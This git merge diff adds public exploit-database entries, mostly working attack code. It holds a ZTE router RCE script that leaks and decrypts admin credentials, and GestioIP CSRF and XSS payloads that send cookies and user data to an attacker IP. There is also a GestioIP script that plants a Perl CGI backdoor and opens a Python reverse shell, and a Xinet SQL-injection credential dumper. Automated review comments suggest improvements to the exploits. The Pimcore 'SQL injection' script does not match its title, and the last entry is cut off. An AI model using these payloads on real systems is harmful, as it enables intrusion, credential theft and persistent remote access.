Merge remote-tracking branch 'exploitdb/main'
commit
3695da6995
15 changed files with 1139 additions and 0 deletions
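--- a/exploits/multiple/hardware/52191.py
+++ b/exploits/multiple/hardware/52191.py
@@ -0,0 +1,331 @@
+# Exploit Title: ZTE ZXHN H168N 3.1 - RCE via authentication bypass
+# Author: l34n / tasos meletlidis
+# Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/
+
+import http.client, requests, os, argparse, struct, zlib
+from io import BytesIO
+from os import stat
+from Crypto.Cipher import AES
+
+def login(host, port, username, password):
+headers = {
+"Content-Type": "application/x-www-form-urlencoded"
+}
+
+data = {
+"Username": username,
+"Password": password,
+"Frm_Logintoken": "",
+"action": "login"
+}
+
+requests.post(f"http://{host}:{port}/", headers=headers, data=data)
+
+def logout(host, port):
+headers = {
+"Content-Type": "application/x-www-form-urlencoded"
+}
+
+data = {
+"IF_LogOff": "1",
+"IF_LanguageSwitch": "",
+"IF_ModeSwitch": ""
+}
+
+requests.post(f"http://{host}:{port}/", headers=headers, data=data)
+
+def leak_config(host, port):
+conn = http.client.HTTPConnection(host, port)
+boundary = "---------------------------25853724551472601545982946443"
+body = (
+f"{boundary}\r\n"
+'Content-Disposition: form-data; name="config"\r\n'
+"\r\n"
+"\r\n"
+f"{boundary}--\r\n"
+)
+
+headers = {
+"Content-Type": f"multipart/form-data; boundary={boundary}",
+"Content-Length": str(len(body)),
+"Connection": "keep-alive",
+}
+
+conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers)
+
+response = conn.getresponse()
+response_data = response.read()
+
+with open("config.bin", "wb") as file:
+file.write(response_data)
+
+conn.close()
+
+def _read_exactly(fd, size, desc="data"):
+chunk = fd.read(size)
+if len(chunk) != size:
+return None
+return chunk
+
+def _read_struct(fd, fmt, desc="struct"):
+size = struct.calcsize(fmt)
+data = _read_exactly(fd, size, desc)
+if data is None:
+return None
+return struct.unpack(fmt, data)
+
+def read_aes_data(fd_in, key):
+encrypted_data = b""
+while True:
+aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header")
+if aes_hdr is None:
+return None
+_, chunk_len, marker = aes_hdr
+
+chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data")
+if chunk is None:
+return None
+
+encrypted_data += chunk
+if marker == 0:
+break
+
+cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
+fd_out = BytesIO()
+fd_out.write(cipher.decrypt(encrypted_data))
+fd_out.seek(0)
+return fd_out
+
+def read_compressed_data(fd_in, enc_header):
+hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
+if enc_header[6] != hdr_crc:
+return None
+
+total_crc = 0
+fd_out = BytesIO()
+
+while True:
+comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
+if comp_hdr is None:
+return None
+uncompr_len, compr_len, marker = comp_hdr
+
+chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
+if chunk is None:
+return None
+
+total_crc = zlib.crc32(chunk, total_crc)
+uncompressed = zlib.decompress(chunk)
+if len(uncompressed) != uncompr_len:
+return None
+
+fd_out.write(uncompressed)
+if marker == 0:
+break
+
+if enc_header[5] != total_crc:
+return None
+
+fd_out.seek(0)
+return fd_out
+
+def read_config(fd_in, fd_out, key):
+ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
+if ver_header_1 is None:
+return
+
+ver_header_2_offset = 0x14 + ver_header_1[4]
+
+fd_in.seek(ver_header_2_offset)
+ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
+if ver_header_2 is None:
+return
+ver_header_3_offset = ver_header_2[10]
+
+fd_in.seek(ver_header_3_offset)
+ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
+if ver_header_3 is None:
+return
+signed_cfg_size = ver_header_3[3]
+
+file_size = stat(fd_in.name).st_size
+
+fd_in.seek(0x80)
+sign_header = _read_struct(fd_in, ">3I", desc="signature header")
+if sign_header is None:
+return
+if sign_header[0] != 0x04030201:
+return
+
+sign_length = sign_header[2]
+
+signature = _read_exactly(fd_in, sign_length, desc="signature")
+if signature is None:
+return
+
+enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
+if enc_header_raw is None:
+return
+encryption_header = struct.unpack(">15I", enc_header_raw)
+if encryption_header[0] != 0x01020304:
+return
+
+enc_type = encryption_header[1]
+
+if enc_type in (1, 2):
+if not key:
+return
+fd_in = read_aes_data(fd_in, key)
+if fd_in is None:
+return
+
+if enc_type == 2:
+enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
+if enc_header_raw is None:
+return
+encryption_header = struct.unpack(">15I", enc_header_raw)
+if encryption_header[0] != 0x01020304:
+return
+enc_type = 0
+
+if enc_type == 0:
+fd_in = read_compressed_data(fd_in, encryption_header)
+if fd_in is None:
+return
+
+fd_out.write(fd_in.read())
+
+def decrypt_config(config_key):
+encrypted = open("config.bin", "rb")
+decrypted = open("decrypted.xml", "wb")
+
+read_config(encrypted, decrypted, config_key)
+
+with open("decrypted.xml", "r") as file:
+contents = file.read()
+username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0]
+password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0]
+
+encrypted.close()
+os.system("rm config.bin")
+decrypted.close()
+os.system("rm decrypted.xml")
+
+return username, password
+
+def change_log_level(host, port, log_level):
+level_map = {
+"critical": "2",
+"notice": "5"
+}
+
+headers = {
+"Content-Type": "application/x-www-form-urlencoded"
+}
+
+data = {
+"IF_ACTION": "Apply",
+"_BASICCONIG": "Y",
+"LogEnable": "1",
+"LogLevel": level_map[log_level],
+"ServiceEnable": "0",
+"Btn_cancel_LogManagerConf": "",
+"Btn_apply_LogManagerConf": "",
+"downloadlog": "",
+"Btn_clear_LogManagerConf": "",
+"Btn_save_LogManagerConf": "",
+"Btn_refresh_LogManagerConf": ""
+}
+
+requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
+requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
+requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
+
+def change_username(host, port, new_username, old_password):
+headers = {
+"Content-Type": "application/x-www-form-urlencoded"
+}
+
+data = {
+"IF_ACTION": "Apply",
+"_InstID": "IGD.AU2",
+"Right": "2",
+"Username": new_username,
+"Password": old_password,
+"NewPassword": old_password,
+"NewConfirmPassword": old_password,
+"Btn_cancel_AccountManag": "",
+"Btn_apply_AccountManag": ""
+}
+
+requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0")
+requests.get(f"http://{host}:{port}/common_page/accountManag_lua.lua")
+requests.post(f"http://{host}:{port}/common_page/accountManag_lua.lua", headers=headers, data=data)
+
+def clear_log(host, port):
+headers = {
+"Content-Type": "application/x-www-form-urlencoded"
+}
+
+data = {
+"IF_ACTION": "clearlog"
+}
+
+requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
+requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
+requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
+
+def refresh_log(host, port):
+headers = {
+"Content-Type": "application/x-www-form-urlencoded"
+}
+
+data = {
+"IF_ACTION": "Refresh"
+}
+
+requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
+requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
+requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)
+
+def trigger_rce(host, port):
+requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_StatusManag_t.lp&Menu3Location=0")
+requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt&Menu3Location=0")
+
+def rce(cmd):
+return f"<? _G.os.execute('rm /var/userlog.txt;{cmd}') ?>"
+
+def pwn(config_key, host, port):
+leak_config(host, port)
+username, password = decrypt_config(config_key)
+
+login(host, port, username, password)
+
+shellcode = "echo \"pwned\""
+payload = rce(shellcode)
+
+change_username(host, port, payload, password)
+refresh_log(host, port)
+change_log_level(host, port, "notice")
+refresh_log(host, port)
+
+trigger_rce(host, port)
+clear_log(host, port)
+
+change_username(host, port, username, password)
+change_log_level(host, port, "critical")
+logout(host, port)
+print("[+] PoC complete")
+
+def main():
+parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1")
+parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"GrWM3Hz<vz&f^9", help="Leaked config encryption key from cspd")
+parser.add_argument("--host", required=True, help="Target IP address of the router")
+parser.add_argument("--port", required=True, type=int, help="Target port of the router")
+
+args = parser.parse_args()
+
+pwn(args.config_key, args.host, args.port)
+
+if __name__ == "__main__":
+main()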
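Review bot: `decrypt_config` opens `config.bin` and `decrypted.xml` with bare `open()` calls that are never closed if `read_config` or the `split` chain raises, and it then deletes them by shelling out with `os.system("rm config.bin")` / `os.system("rm decrypted.xml")`; use `with open(...)` for both handles and `os.remove("config.bin")` / `os.remove("decrypted.xml")` so the downloaded configuration is not left on disk after a failure. The `desc` parameter of `_read_exactly` and `_read_struct` is accepted but never read, and `read_config` computes `signed_cfg_size` and `file_size` without using them, so either drop them or add a comment stating what they are reserved for. The module and its parsing helpers carry no docstrings; a header comment on `read_config` describing the sequence it walks (version headers, signature block at 0x80, 0x3C-byte encryption header, then `read_aes_data` / `read_compressed_data`) would make the format handling reviewable.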
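--- a/exploits/multiple/remote/52200.txt
+++ b/exploits/multiple/remote/52200.txt
@@ -0,0 +1,76 @@
+# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
+# Exploit Author: m4xth0r (Maximiliano Belino)
+# Author website: https://maxibelino.github.io/
+# Author email : max.cybersecurity at belino.com
+# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
+# Date: 2025-01-13
+# Vendor Homepage: https://www.gestioip.net/
+# Software Link: https://www.gestioip.net/en/download/
+# Version: GestioIP v3.5.7
+# Tested on: Kali Linux
+# CVE: CVE-2024-50858
+
+### Description
+
+The GestioIP application has many endpoints and they are vulnerable to CSRF. This allows an attacker to execute actions through the admin's browser on the application if the admin visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate data from the application.
+
+### Prerequisites
+
+The option "Manage - Manage GestioIP - User Management" must be enabled previously.
+
+
+### Usage
+
+To exploit this vulnerability, an attacker must host ```payload.html``` on an attacker-controlled web server (python3 -m http.server 8090). When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator.
+
+
+### File: payload.html
+#### example: editing user named 'maxi'
+
+
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>Welcome to our site</title>
+<style>
+body {
+font-family: Arial, sans-serif;
+text-align: center;
+}
+.container {
+margin-top: 50px;
+}
+iframe {
+display: none;
+}
+</style>
+</head>
+<body>
+<div class="container">
+<h1>Thank you for visiting our site!</h1>
+<p>We are processing your request, please wait a moment...</p>
+<img src="https://placehold.co/150?text=Processing" alt="Processing...">
+</div>
+<!-- hidden iframe -->
+
+<iframe name="hiddenFrame"></iframe>
+
+<!-- The form that makes the POST to GestioIP Server -->
+<form action="[http://localhost/gestioip/res/ip_mod_user.cgi](http://localhost/gestioip/res/ip_mod_user.cgi)" method="POST" target="hiddenFrame">
+<input type="hidden" name="name" value="maxi">
+<input type="hidden" name="group_id" value="1">
+<input type="hidden" name="email" value="maxi@test.com">
+<input type="hidden" name="phone" value="123">
+<input type="hidden" name="comment" value="">
+<input type="hidden" name="client_id" value="1">
+<input type="hidden" name="id" value="2">
+<input type="hidden" name="B2" value="">
+</form>
+<script>
+history.pushState('', '', '/');
+document.forms[0].submit();
+</script>
+</body>
+</html>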
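--- a/exploits/multiple/remote/52201.txt
+++ b/exploits/multiple/remote/52201.txt
@@ -0,0 +1,56 @@
+# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Stored Cross-Site Scripting
+# Exploit Author: m4xth0r (Maximiliano Belino)
+# Author website: https://maxibelino.github.io/
+# Author email: max.cybersecurity at belino.com
+# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50861
+# Date: 2025-01-13
+# Vendor Homepage: https://www.gestioip.net/
+# Software Link: https://www.gestioip.net/en/download/
+# Version: GestioIP v3.5.7
+# Tested on: Kali Linux
+# CVE: CVE-2024-50861
+
+### Description
+
+The http://localhost/gestioip/res/ip_mod_dns_key_form.cgi feature of GestioIP 3.5.7 is vulnerable to Stored XSS. An authenticated attacker with appropriate permissions can inject malicious code into the tsig_key form field and save it to the database. Once saved, any user who accesses the "DNS Key" page will trigger the Stored XSS, leading to the execution of malicious code.
+
+### Prerequisites
+
+1. Enable "DNS Key" Feature
+First, ensure that "Dynamic DNS updates" is enabled in the global configuration:
+
+Manage > Manage GestioIP > Global Configuration > Dynamic DNS updates enabled: yes
+
+This will enable the following menus:
+
+Manage > DNS Keys
+Manage > DNS Update User
+
+2. Create a DNS Key Entry
+
+To create a new DNS key entry and also edit an existing one, the user must belong to a group with the "Manage Sites And Categories" permission. By default, "Admin" and "GestioIP Admin" groups have this permission.
+
+Also, you can configure this permission to any group under:
+
+Manage > User Groups > Manage Sites and Categories
+
+3. Enter payload.
+
+Once group permission is set, input one of the following payloads into the "TSIG Key" (tsig_key) field and save it.
+
+
+### Payloads
+
+1 - Test basic XSS
+
+<script>alert("test")</script>
+
+
+2 - Send data (cookies) to the attacker's server
+
+<svg/onload="fetch('http://10.20.0.1:8000/steal_data',{method:'POST',body:document.cookie})">
+
+
+3 - Redirect the user to a malicious site
+
+<svg/onload="window.location='http://10.20.0.1:8090/malicious_page.html'">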
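--- a/exploits/multiple/remote/52202.txt
+++ b/exploits/multiple/remote/52202.txt
@@ -0,0 +1,58 @@
+# Exploit Title: GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
+# Exploit Author: m4xth0r (Maximiliano Belino)
+# Author website: https://maxibelino.github.io/
+# Author email (max.cybersecurity at belino.com)
+# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50859
+# Date: 2025-01-13
+# Vendor Homepage: https://www.gestioip.net/
+# Software Link: https://www.gestioip.net/en/download/
+# Version: GestioIP v3.5.7
+# Tested on: Kali Linux
+# CVE: CVE-2024-50859
+
+### Description
+
+The ip_import_acl_csv request is vulnerable to Reflected XSS (Reflected Cross-Site Scripting); the user can upload a file and the file content is reflected in the HTML response without being sanitized. If the file uploaded by the user has an incorrect format and an error occurs during its processing, part of the file's content may be displayed in the browser. If this content includes HTML or scripts and it is not properly escaped, the browser could interpret it, leading to a security vulnerability. This could allow data exfiltration and enabling CSRF (Cross-Site Request Forgery) attacks.
+Proper input validation and output encoding are critical to prevent this vulnerability.
+
+
+### Prerequisites
+
+Enable (set to 'yes') the parameter:
+
+Manage > Manage GestioIP > ACL connection management
+
+
+### Usage
+
+Select: import/export > Import ACLs/ACL Connections
+
+Select: "Connection List"
+
+Select "report only"
+
+Browse to select the file you want to upload.
+
+Click 'upload'
+
+
+
+### Payloads
+
+#### 1) html file to upload
+
+<html><script src="http://10.20.0.1:8090/refxss_exfiltrate_3.js"></script></html>
+
+
+#### 2) js file to exfiltrate data
+
+var req1 = new XMLHttpRequest();
+req1.open('GET',"http://localhost/gestioip/res/ip_show_user.cgi", false);
+req1.send();
+
+response = req1.responseText;
+
+var req2 = new XMLHttpRequest();
+req2.open('POST', "http://10.20.0.1:8000/steal_data", false);
+req2.setRequestHeader('Content-Type', 'text/html');
+req2.send(response);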
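--- a/exploits/multiple/remote/52203.txt
+++ b/exploits/multiple/remote/52203.txt
@@ -0,0 +1,34 @@
+# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Scripting (XSS)
+# Exploit Author: m4xth0r (Maximiliano Belino)
+# Author website: https://maxibelino.github.io/
+# Author email (max.cybersecurity at belino.com)
+# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50857
+# Date: 2025-01-13
+# Vendor Homepage: https://www.gestioip.net/
+# Software Link: https://www.gestioip.net/en/download/
+# Version: GestioIP v3.5.7
+# Tested on: Kali Linux
+# CVE: CVE-2024-50857
+
+### Description
+
+The `"ip_do_job"` feature of GestioIP 3.5.7 is vulnerable to XSS, leading to data exfiltration and CSRF attacks. Two examples are described below.
+
+### Prerequisites
+
+To successfully exploit the XSS vulnerability, the user must be part of a "User Group" that has the following three permissions:
+
+• Show backuped device configurations (read_device_config_perm)
+• Upload device configurations (write_device_config_perm)
+• Administrate CM (administrative_cm_perm)
+
+
+
+1) vulnerable parameter: `host_id`
+
+http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&host_id='<script>alert("test")</script>'
+
+
+2) vulnerable parameter: `stored_config`
+
+http://localhost/gestioip/res/cm/ip_do_job.cgi?client_id=1&stored_config='<script>alert("test")</script>'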
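--- a/exploits/multiple/remote/52204.txt
+++ b/exploits/multiple/remote/52204.txt
@@ -0,0 +1,102 @@
+# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
+# Exploit Author: m4xth0r (Maximiliano Belino)
+# Author website: https://maxibelino.github.io/
+# Author email (max.cybersecurity at belino.com)
+# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
+# Date: 2025-01-13
+# Vendor Homepage: https://www.gestioip.net/
+# Software Link: https://www.gestioip.net/en/download/
+# Version: GestioIP v3.5.7
+# Tested on: Kali Linux
+# CVE: CVE-2024-48760
+
+import requests
+import sys
+
+# Config
+username = "gipadmin"
+password = "PASSWORD"
+domain = "localhost"
+local_ip = "10.20.0.1"
+local_port = 443
+target_url = f"http://{domain}/gestioip/api/upload.cgi"
+
+# CGI Backdoor Perl
+backdoor_code = """#!/usr/bin/perl -w
+
+use strict;
+
+print "Cache-Control: no-cache\\n";
+print "Content-type: text/html\\n\\n";
+
+my $req = $ENV{QUERY_STRING};
+chomp ($req);
+$req =~ s/%20/ /g;
+$req =~ s/%3b/;/g;
+$req =~ s/%7c/|/gi;
+$req =~ s/%27/'/g;
+$req =~ s/%22/"/g;
+$req =~ s/%5D/]/g;
+$req =~ s/%5B/[/g;
+
+print "<html><body>";
+print '<!-- CGI backdoor -->';
+
+if (!$req) {
+print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
+} else {
+print "Executing: $req";
+}
+
+print "<pre>";
+my @cmd = `$req`;
+print "</pre>";
+
+foreach my $line (@cmd) {
+print $line . "<br/>";
+}
+
+print "</body></html>";
+"""
+
+# Exploit functions
+def upload_file(session, file_name, file_data):
+"""Uploads the file to the server"""
+files = {
+'file_name': (None, file_name),
+'leases_file': (file_name, file_data)
+}
+response = session.post(target_url, files=files)
+if "OK" not in response.text:
+print(f"[!] Error uploading {file_name}.")
+sys.exit(1)
+return response
+
+def run_command(session, cmd):
+"""Execute a command in the server through the vuln"""
+url = target_url + '?' + cmd
+resp = session.get(url)
+print(resp.text)
+
+def backdoor_exists(session):
+"""Verifies if backdoor is already uploaded or not"""
+response = session.get(target_url + "?whoami")
+if "www-data" in response.text:
+return True # backdoor already uploaded
+return False # backdoor not uploaded yet
+
+if __name__ == '__main__':
+with requests.Session() as session:
+session.auth = (username, password)
+
+# Verify if backdoor is already uploaded
+if not backdoor_exists(session):
+print("\n[!] Uploading backdoor...\n")
+upload_file(session, 'upload.cgi', backdoor_code)
+else:
+print("\n[+] Backdoor already uploaded. Continue...\n")
+
+# Execute the reverse shell
+print("\n[!] Executing reverse shell...\n")
+reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
+run_command(session, reverse_shell_cmd)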
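Review bot: `upload_file` terminates the whole interpreter with `sys.exit(1)` when `"OK"` is missing from the response, so the `with requests.Session()` block in `__main__` never gets to report or clean up; a helper should `raise RuntimeError(f"upload of {file_name} failed")` and let the entry point decide. The `# Config` block hard-codes `username`, `password = "PASSWORD"`, `domain`, `local_ip` and `local_port` with no argument parsing and no mention in the header, so a reader cannot tell which values are placeholders and which are real; a comment such as `# Config: edit these before running; PASSWORD is a placeholder` would make that explicit. `backdoor_exists` infers success from the literal `"www-data"` appearing in the body, which is only true for that one service account, so the docstring should state that assumption.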
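--- a/exploits/multiple/webapps/52192.py
+++ b/exploits/multiple/webapps/52192.py
@@ -0,0 +1,189 @@
+# Exploit Title: Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
+# Exploit author: hyp3rlinx
+
+import requests,time,re,sys,argparse
+
+#NAPC Xinet Elegant 6 Asset Library v6.1.655
+#Pre-Auth SQL Injection 0day Exploit
+#By hyp3rlinx
+#ApparitionSec
+#UPDATED: Jan 2024 for python3
+#TODO: add SSL support
+#===============================
+#This will dump tables, usernames and passwords in vulnerable versions
+#REQUIRE PARAMS: LoginForm[password]=&LoginForm[rememberMe]=0&LoginForm[username]=SQL&yt0
+#SQL INJECTION VULN PARAM --> LoginForm[username]
+#================================================
+
+IP=""
+PORT="80"
+URL=""
+NUM_INJECTS=20
+k=1
+j=0
+TABLES=False
+CREDS=False
+SHOW_SQL_ERROR=False
+
+
+def vuln_ver_chk():
+global IP, PORT
+TARGET = "http://"+IP+":"+PORT+"/elegant6/login"
+response = requests.get(TARGET)
+if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content.decode()):
+print("[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655.")
+return True
+print("[!] Version not vulnerable :(")
+return False
+
+
+def sql_inject_request(SQL):
+
+global IP, PORT
+URL = "http://"+IP+":"+PORT+"/elegant6/login"
+
+tmp=""
+headers = {'User-Agent': 'Mozilla/5.0'}
+payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL}
+session = requests.Session()
+
+res = session.post(URL,headers=headers,data=payload)
+idx = res.content.decode('utf-8').find('CDbCommand') # Start of SQL Injection Error in response
+idx2 = res.content.decode('utf-8').find('key 1') # End of SQL Injection Error in response
+
+return res.content[idx : idx2+3]
+
+
+
+#Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc
+def inc():
+global k,j
+while j < NUM_INJECTS:
+j+=1
+if k !=1:
+k+=1
+return str(j)+','+str(k)
+
+
+def tidy_up(results):
+global CREDS
+idx = results.find("'".encode())
+if idx != -1:
+idx2 = results.rfind("'".encode())
+if not CREDS:
+return results[idx + 1: idx2 -2]
+else:
+return results[idx + 2: idx2]
+
+
+
+def breach(i):
+global k,j,NUM_INJECTS,SHOW_SQL_ERROR
+result=""
+
+#Dump Usernames & Passwords
+if CREDS:
+if i % 2 == 0:
+target='username'
+else:
+target='password'
+
+SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))'
+'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -')
+
+if not SHOW_SQL_ERROR:
+result = tidy_up(sql_inject_request(SQL))
+if result:
+result = result.decode()
+else:
+result = sql_inject_request(SQL)+"\n"
+if result:
+result = result.decode()
+print("[+] Dumping "+str(target)+": "+str(result))
+
+#Dump Tables
+if TABLES:
+while j < NUM_INJECTS:
+nums = inc()
+SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()'
+'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -')
+
+if not SHOW_SQL_ERROR:
+result = tidy_up(sql_inject_request(SQL))
+else:
+result = sql_inject_request(SQL) + "\n"
+if result:
+print("[+] Dumping Table... " +str(result.decode()))
+time.sleep(0.3)
+
+
+
+def parse_args():
+parser = argparse.ArgumentParser()
+parser.add_argument("-i", "--ip_address", help="<TARGET-IP>.")
+parser.add_argument("-p", "--port", help="Port, Default is 80")
+parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.")
+parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.")
+parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.")
+parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1", help="Display SQL Errors, Default is Clean Dumps.")
+parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show script usage.")
+return parser.parse_args()
+
+
+
+def usage():
+print("Dump first ten rows of usernames and passwords")
+print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -c -m 10\n")
+print("\nDump first five rows of database tables and show SQL errors")
+print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -t -m 5 -s\n")
+print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -p80 -t -c -m30\n")
+exit(0)
+
+
+def main(args):
+
+global TABLES,CREDS,URL,IP,NUM_INJECTS,SHOW_SQL_ERROR
+
+if args.ip_address:
+IP=args.ip_address
+
+if args.port:
+PORT=args.port
+
+if args.get_tables:
+TABLES=True
+
+if args.creds:
+CREDS=True
+
+if args.max_injects:
+NUM_INJECTS = int(args.max_injects)
+
+if args.show_sql_errors:
+SHOW_SQL_ERROR=True
+
+if args.examples:
+usage()
+
+if vuln_ver_chk():
+for i in range(0, NUM_INJECTS):
+breach(i)
+time.sleep(0.3)
+
+
+if __name__=='__main__':
+
+parser = argparse.ArgumentParser()
+
+print("NAPC Elegant 6 Asset Library v6.1.655")
+print("Pre-Authorization SQL Injection 0day Exploit")
+print("Discovery / eXploit By hyp3rlinx")
+print("ApparitionSec\n")
+
+time.sleep(0.5)
+
+if len(sys.argv)== 1:
+parser.print_help(sys.stderr)
+sys.exit(0)
+
+main(parse_args())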
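Review bot: The `__main__` block builds a second, empty `argparse.ArgumentParser()` and calls `parser.print_help(sys.stderr)` on it when no arguments are given, so the user sees a bare usage line with none of the `-i/-p/-t/-c/-m/-s/-e` options that `parse_args` registers; construct the parser once (a `build_parser()` helper returning the configured parser, used by both `parse_args` and the no-argument path) and let argparse print the real help. `main` declares `global ... PORT ...` nowhere — it assigns `PORT=args.port` while only `TABLES,CREDS,URL,IP,NUM_INJECTS,SHOW_SQL_ERROR` are in its `global` statement, so `-p` sets a local that `vuln_ver_chk` and `sql_inject_request` never see and the module-level `PORT="80"` is always used. `usage()` ends with the builtin `exit(0)` although `sys` is imported; `sys.exit(0)` is the portable form, and the unused `tmp=""` in `sql_inject_request` and the module-level `URL=""` (shadowed by a local of the same name) should be removed.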
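--- a/exploits/multiple/webapps/52193.py
+++ b/exploits/multiple/webapps/52193.py
@@ -0,0 +1,42 @@
+# Exploit Title: Pimcore customer-data-framework 4.2.0 - SQL injection
+# Date: 01/28/2025
+# Exploit Author: maeitsec
+# Vendor Homepage: https://pimcore.com/
+# Software Link: https://github.com/pimcore/pimcore
+# Version: Pimcore versions prior to 10.5.21
+# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
+# CVE: CVE-2024-11956
+
+import requests
+
+# Replace with target URL and credentials
+TARGET_URL = "http://example.com/pimcore"
+USERNAME = "low_privilege_user"
+PASSWORD = "password123"
+
+# Authenticate and get session
+session = requests.Session()
+login_data = {
+"username": USERNAME,
+"password": PASSWORD
+}
+login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data)
+
+if "Login successful" in login_response.text:
+print("[+] Authenticated successfully.")
+
+# Exploit the downloadAsZip functionality
+download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
+payload = {
+"ids[]": ["1", "2", "3"] # Replace with IDs of restricted files/folders
+}
+download_response = session.post(download_url, data=payload)
+
+if download_response.status_code == 200:
+print("[+] Exploit successful. Restricted files downloaded.")
+with open("restricted_files.zip", "wb") as f:
+f.write(download_response.content)
+else:
+print("[-] Exploit failed. Server returned:", download_response.status_code)
+else:
+print("[-] Authentication failed.")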
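Review bot: The header advertises `SQL injection` in `customer-data-framework 4.2.0` (CVE-2024-11956), but the script only posts three asset IDs to `/admin/asset/download-as-zip` and reports success on any HTTP 200, so the title, version line and code describe different issues; the header should state what the script actually exercises, or the script should be replaced by one matching the advisory. Treating `status_code == 200` as proof that restricted assets were returned is unsound, since an HTML error or login page also answers 200; at minimum the response should be checked for a ZIP `Content-Type` or the `PK` signature before `restricted_files.zip` is written. The authentication branch likewise keys on the literal `"Login successful"` appearing in the login body, which nothing on the page documents as the application's real response; a comment saying where that string comes from, or a check on the session cookie, would make the PoC reviewable.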
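--- a/exploits/multiple/webapps/52194.py
+++ b/exploits/multiple/webapps/52194.py
@@ -0,0 +1,30 @@
+# Exploit Title: Authenticated Stored Cross-Site Scripting (XSS) Via Search
+Document
+# Google Dork: N/A
+# Date: 1/28/2025
+# Exploit Author: maeitsec
+# Vendor Homepage: https://pimcore.com/
+# Software Link: https://github.com/pimcore/pimcore
+# Version: Pimcore 10.5.x (prior to 10.5.21) and 11.x (prior to 11.1.1)
+# Tested on: Pimcore 10.5.20 on Ubuntu 20.04
+# CVE: CVE-2024-11954
+
+---
+
+### Description:
+A stored Cross-Site Scripting (XSS) vulnerability exists in Pimcore's Data
+Object Classification Store functionality. The vulnerability arises due to
+insufficient input sanitization, allowing an authenticated attacker with
+access to the classification store to inject malicious JavaScript code.
+This code is then executed in the context of other users' browsers when
+they view the affected data.
+
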